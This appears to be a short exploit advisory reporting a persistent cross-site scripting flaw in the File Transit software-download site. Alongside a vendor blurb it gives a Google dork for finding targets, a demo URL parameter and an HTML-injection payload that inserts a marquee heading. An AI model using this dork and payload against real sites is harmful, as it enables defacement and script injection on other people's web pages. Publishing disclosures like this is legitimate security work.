File Transit Inc. suffers from a persistent cross site scripting vulnerability.
4a00e7f61f424a09b071b241709d6bd64db97012fd747ce4bc3fcff5c1db1e47
%+
$.......#........4.........|)........0............\/\/ %+
%+
%+
%++++++++++++++++++++++++++++++++++++++++
# Exploit Title:File Transit Inc. persistent XSS vulnerability
#Vendor: www.filetransit.com
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D(
karthikaryabhat@gmail.com)
#Google Dork: File Transit © 1998-2010
*****************************************************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
File Transit Inc. provides software for free use or trial. Some of the
software you find here will be 100% free - you can download it and not worry
about ever paying for it. Some of the free software is supported purely by
an author's goodwill, some by ads, and others by donations (please support
such authors if you find their software useful). Other software is designed
for trial use. Sometimes an author will provide a free basic version of
their software in hope you will want to purchase a more feature rich version
from them. Similarly, some software comes with some features disabled until
you purchase it. Some software will only work for a limited time (either a
certain number of days or a set number of uses). When you have completed the
trial use it will fail to work until you purchase it. Each author is free to
devise their own way of providing software for use, and many have unique
methods!
******************************************************************************************************************************************************************************************
Persistent XSS Vulnerability
********************************
{DEMO} : target/demo.php?name=Telnet_Server-2-3'
EXPLOIT: ">><marquee><h1>$#4|)0\/\/</h1></marquee>
Observe: A persistent cross-site scripting vulnerability in File Transit
Inc. can be exploited to execute arbitrary JavaScript.
*****************************************************************************************************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14--
**************************************************************************